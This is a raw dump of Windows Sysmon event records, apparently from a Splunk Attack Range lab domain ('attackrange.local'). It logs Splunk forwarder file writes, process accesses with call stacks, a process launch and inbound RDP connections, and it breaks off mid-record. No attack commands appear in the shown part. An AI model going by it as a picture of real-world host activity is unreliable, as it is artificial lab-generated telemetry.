AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.506{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=753D0242BCC969C0E17F5D6EC9BE6E38,SHA256=B8110EB3B45CEF6B3A631D78B271C950D737FDFBDDE138A6443523F829B592A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979460Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:51.281{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59616-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979459Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:50.802{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49750-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001050773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.269{5EBD8912-8B8D-6151-4A7A-00000000FC01}9966676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.238{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDAAD2DB6A8F8D5EAF5A8C41CC8BA084,SHA256=C2ADA17F9FD241034B6662F2AD1BB0ED87A489205C9400AA8373CCF47B0E5702,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B8D-6151-4A7A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B8D-6151-4A7A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:53.991{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B8D-6151-4A7A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.637{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1230385D792925D1BAF697274E173C2,SHA256=4ABFD36F29EE4843561BCFFA21FF23E51A074577AFCFCCCF1BC8530E0B18C814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.521{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9697907AF6A98053393B3D77BCBF35E3,SHA256=1E461D3ABA7F19D1FDB7683D4CB28DDAE07FECD91458A7CA36138FC040219D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979461Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:55.038{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12B540AAE430D63A4F436E931D59CDD,SHA256=C71ACCAB83054E363858D5801607BB1D13D25E5499754029101D9D5ACAAC1221,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B8F-6151-4C7A-00000000FC01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8B8F-6151-4C7A-00000000FC01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.321{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B8F-6151-4C7A-00000000FC01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.306{5EBD8912-8B8F-6151-4C7A-00000000FC01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.213{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51937-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:54.808{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51686-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:56.768{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D80340FCCFE9CABEBDFDCF2D3B598C3,SHA256=7E8EAB7880A259CEDB0158D592932BA34EA030A35CE266FB1CB5D7F6645E9EEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:56.521{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0918135A31E4B72FC3E1461B3E232C2F,SHA256=2FA319378DD7CFD3015068BD8369C66CA06EBD49B496075817DC0D92BD388B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979462Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:56.100{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79B458EB03013A52F6D4D8B6E8AE25E2,SHA256=CC5E82A0A02A8FE7510D088057141CAE670E1ACA084E822665AEBE2AD68B9369,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:56.168{5EBD8912-8B8F-6151-4D7A-00000000FC01}10204680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.990{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B8F-6151-4D7A-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.990{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.990{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.990{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 